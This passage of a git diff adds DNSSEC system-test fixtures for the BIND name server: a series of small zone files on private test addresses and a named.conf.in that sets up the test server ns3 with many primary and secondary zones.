10.0.0.29 + + diff --git a/bin/tests/system/dnssec/ns3/expiring.example.db.in b/bin/tests/system/dnssec/ns3/expiring.example.db.in new file mode 100644 index 0000000..8acf7b1 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/expiring.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns + MX 10 mx +ns A 10.53.0.3 +mx A 10.0.0.30 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +child NS ns2.example. +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17 diff --git a/bin/tests/system/dnssec/ns3/future.example.db.in b/bin/tests/system/dnssec/ns3/future.example.db.in new file mode 100644 index 0000000..20c19c5 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/future.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +child NS ns2.example. +insecure.empty NS ns.insecure.empty +ns.insecure.empty A 10.53.0.3 +foo.*.empty-wild NS ns diff --git a/bin/tests/system/dnssec/ns3/generic.example.db.in b/bin/tests/system/dnssec/ns3/generic.example.db.in new file mode 100644 index 0000000..5cc3ecc --- /dev/null +++ b/bin/tests/system/dnssec/ns3/generic.example.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a.b A 10.0.0.1 diff --git a/bin/tests/system/dnssec/ns3/inline.example.db b/bin/tests/system/dnssec/ns3/inline.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/inline.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/insecure.below-cname.example.db b/bin/tests/system/dnssec/ns3/insecure.below-cname.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure.below-cname.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/insecure.example.db b/bin/tests/system/dnssec/ns3/insecure.example.db new file mode 100644 index 0000000..76e3f47 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure.example.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x DNSKEY 258 3 5 Cg== +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/insecure.nsec3.example.db b/bin/tests/system/dnssec/ns3/insecure.nsec3.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure.nsec3.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/insecure.optout.example.db b/bin/tests/system/dnssec/ns3/insecure.optout.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure.optout.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/insecure2.example.db b/bin/tests/system/dnssec/ns3/insecure2.example.db new file mode 100644 index 0000000..76e3f47 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure2.example.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x DNSKEY 258 3 5 Cg== +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/key.db.in b/bin/tests/system/dnssec/ns3/key.db.in new file mode 100644 index 0000000..0165e3f --- /dev/null +++ b/bin/tests/system/dnssec/ns3/key.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/dnssec/ns3/kskonly.example.db.in b/bin/tests/system/dnssec/ns3/kskonly.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/kskonly.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/dnssec/ns3/lower.example.db.in b/bin/tests/system/dnssec/ns3/lower.example.db.in new file mode 100644 index 0000000..a04793e --- /dev/null +++ b/bin/tests/system/dnssec/ns3/lower.example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA MNAME1. . ( + 2012042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS NS +NS A 10.53.0.3 diff --git a/bin/tests/system/dnssec/ns3/managed-future.example.db.in b/bin/tests/system/dnssec/ns3/managed-future.example.db.in new file mode 100644 index 0000000..20c19c5 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/managed-future.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +child NS ns2.example. +insecure.empty NS ns.insecure.empty +ns.insecure.empty A 10.53.0.3 +foo.*.empty-wild NS ns diff --git a/bin/tests/system/dnssec/ns3/multiple.example.db.in b/bin/tests/system/dnssec/ns3/multiple.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/multiple.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/named.conf.in b/bin/tests/system/dnssec/ns3/named.conf.in new file mode 100644 index 0000000..bd0771d --- /dev/null +++ b/bin/tests/system/dnssec/ns3/named.conf.in @@ -0,0 +1,382 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; + session-keyfile "session.key"; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type secondary; + primaries { 10.53.0.2; }; + file "example.bk"; +}; + +zone "secure.example" { + type primary; + file "secure.example.db.signed"; + allow-update { any; }; +}; + +zone "bogus.example" { + type primary; + file "bogus.example.db.signed"; + allow-update { any; }; +}; + +zone "badds.example" { + type primary; + file "badds.example.db.signed"; + allow-update { any; }; +}; + +zone "dynamic.example" { + type primary; + file "dynamic.example.db.signed"; + allow-update { any; }; +}; + +zone "insecure.example" { + type primary; + file "insecure.example.db"; + allow-update { any; }; +}; + +zone "insecure2.example" { + type primary; + file "insecure2.example.db"; + allow-update { any; }; +}; + +zone "insecure.nsec3.example" { + type primary; + file "insecure.nsec3.example.db"; + allow-update { any; }; +}; + +zone "insecure.optout.example" { + type primary; + file "insecure.optout.example.db"; + allow-update { any; }; +}; + +zone "keyless.example" { + type primary; + file "keyless.example.db.signed"; +}; + +zone "nsec3.example" { + type primary; + file "nsec3.example.db.signed"; +}; + +zone "optout.nsec3.example" { + type primary; + file "optout.nsec3.example.db.signed"; +}; + +zone "nsec3.nsec3.example" { + type primary; + file "nsec3.nsec3.example.db.signed"; +}; + +zone "secure.nsec3.example" { + type primary; + file "secure.nsec3.example.db.signed"; +}; + +zone "optout.example" { + type primary; + file "optout.example.db.signed"; +}; + +zone "secure.optout.example" { + type primary; + file "secure.optout.example.db.signed"; +}; + +zone "nsec3.optout.example" { + type primary; + file "nsec3.optout.example.db.signed"; +}; + +zone "optout.optout.example" { + type primary; + file "optout.optout.example.db.signed"; +}; + +zone "nsec3-unknown.example" { + type primary; + nsec3-test-zone yes; + file "nsec3-unknown.example.db.signed"; +}; + +zone "optout-unknown.example" { + type primary; + nsec3-test-zone yes; + file "optout-unknown.example.db.signed"; +}; + +zone "dnskey-unknown.example" { + type primary; + file "dnskey-unknown.example.db.signed"; +}; + +zone "dnskey-unsupported.example" { + type primary; + file "dnskey-unsupported.example.db.signed"; +}; + +zone "dnskey-unsupported-2.example" { + type primary; + file "dnskey-unsupported-2.example.db.signed"; +}; + +zone "dnskey-nsec3-unknown.example" { + type primary; + nsec3-test-zone yes; + file "dnskey-nsec3-unknown.example.db.signed"; +}; + +zone "multiple.example" { + type primary; + file "multiple.example.db.signed"; + allow-update { any; }; +}; + +zone "rfc2335.example" { + type secondary; + primaries { 10.53.0.2; }; + file "rfc2335.example.bk"; +}; + +zone "rsasha256.example" { + type primary; + file "rsasha256.example.db.signed"; +}; + +zone "rsasha512.example" { + type primary; + file "rsasha512.example.db.signed"; +}; + +zone "kskonly.example" { + type primary; + file "kskonly.example.db.signed"; +}; + +zone "expired.example" { + type primary; + allow-update { none; }; + file "expired.example.db.signed"; +}; + +zone "update-nsec3.example" { + type primary; + allow-update { any; }; + file "update-nsec3.example.db.signed"; +}; + +zone "auto-nsec.example" { + type primary; + auto-dnssec maintain; + allow-update { !0.0.0.0; }; + file "auto-nsec.example.db.signed"; +}; + +zone "auto-nsec3.example" { + type primary; + auto-dnssec maintain; + allow-update { !0.0.0.0; }; + file "auto-nsec3.example.db.signed"; +}; + +zone "insecure.below-cname.example" { + type primary; + file "insecure.below-cname.example.db"; +}; + +zone "secure.below-cname.example" { + type primary; + file "secure.below-cname.example.db.signed"; +}; + +zone "ttlpatch.example" { + type primary; + file "ttlpatch.example.db.patched"; +}; + +zone "split-dnssec.example" { + type primary; + file "split-dnssec.example.db"; +}; + +zone "split-smart.example" { + type primary; + file "split-smart.example.db"; +}; + +zone "nsec3chain-test" { + type secondary; + file "nsec3chain-test.bk"; + primaries { 10.53.0.2; }; +}; + +zone "expiring.example" { + type primary; + allow-update { any; }; + file "expiring.example.db.signed"; +}; + +zone "nosign.example" { + type primary; + allow-update { any; }; + dnssec-update-mode no-resign; + file "nosign.example.db.signed"; +}; + +zone "upper.example" { + type primary; + file "upper.example.db.signed"; +}; + +zone "LOWER.EXAMPLE" { + type primary; + file "lower.example.db.signed"; +}; + +zone "inline.example" { + type primary; + file "inline.example.db"; + inline-signing yes; + auto-dnssec maintain; +}; + +zone "publish-inactive.example" { + type primary; + file "publish-inactive.example.db"; + auto-dnssec maintain; + update-policy local; +}; + +zone "future.example" { + type primary; + file "future.example.db.signed"; +}; + +zone "managed-future.example" { + type primary; + file "managed-future.example.db.signed"; + allow-update { any; }; +}; + +zone "revkey.example" { + type primary; + file "revkey.example.db.signed"; +}; + +zone "dname-at-apex-nsec3.example" { + type primary; + file "dname-at-apex-nsec3.example.db.signed"; +}; + +zone "occluded.example" { + type primary; + file "occluded.example.db.signed"; +}; + +zone "secure.managed" { + type primary; + file "secure.managed.db.signed"; +}; + +zone "disabled.managed" { + type primary; + file "disabled.managed.db.signed"; +}; + +zone "enabled.managed" { + type primary; + file "enabled.managed.db.signed"; +}; + +zone "unsupported.managed" { + type primary; + file "unsupported.managed.db.signed"; +}; + +zone "revoked.managed" { + type primary; + file "revoked.managed.db.signed"; +}; + +zone "secure.trusted" { + type primary; + file "secure.trusted.db.signed"; +}; + +zone "disabled.trusted" { + type primary; + file "disabled.trusted.db.signed"; +}; + +zone "enabled.trusted" { + type primary; + file "enabled.trusted.db.signed"; +}; + +zone "unsupported.trusted" { + type primary; + file "unsupported.trusted.db.signed"; +}; + +zone "revoked.trusted" { + type primary; + file "revoked.trusted.db.signed"; +}; + +zone "too-many-iterations" { + type secondary; + primaries { 10.53.0.2; }; + file "too-many-iterations.bk"; +}; + +include "siginterval.conf"; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ns3/nosign.example.db.in b/bin/tests/system/dnssec/ns3/nosign.example.db.in new file mode 100644 index 0000000..2be8a28 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nosign.example.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 diff --git a/bin/tests/system/dnssec/ns3/nsec3-unknown.example.db.in b/bin/tests/system/dnssec/ns3/nsec3-unknown.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3-unknown.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/nsec3.example.db.in b/bin/tests/system/dnssec/ns3/nsec3.example.db.in new file mode 100644 index 0000000..55b3877 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3.example.db.in @@ -0,0 +1,38 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +child NS ns2.example. +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17 diff --git a/bin/tests/system/dnssec/ns3/nsec3.nsec3.example.db.in b/bin/tests/system/dnssec/ns3/nsec3.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3.nsec3.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/dnssec/ns3/nsec3.optout.example.db.in b/bin/tests/system/dnssec/ns3/nsec3.optout.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3.optout.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/dnssec/ns3/occluded.example.db.in b/bin/tests/system/dnssec/ns3/occluded.example.db.in new file mode 100644 index 0000000..ee9c900 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/occluded.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a.b A 10.0.0.1 +delegation NS ns + A 10.53.0.3 + AAAA 2002:: diff --git a/bin/tests/system/dnssec/ns3/optout-unknown.example.db.in b/bin/tests/system/dnssec/ns3/optout-unknown.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/optout-unknown.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/optout.example.db.in b/bin/tests/system/dnssec/ns3/optout.example.db.in new file mode 100644 index 0000000..20c19c5 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/optout.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 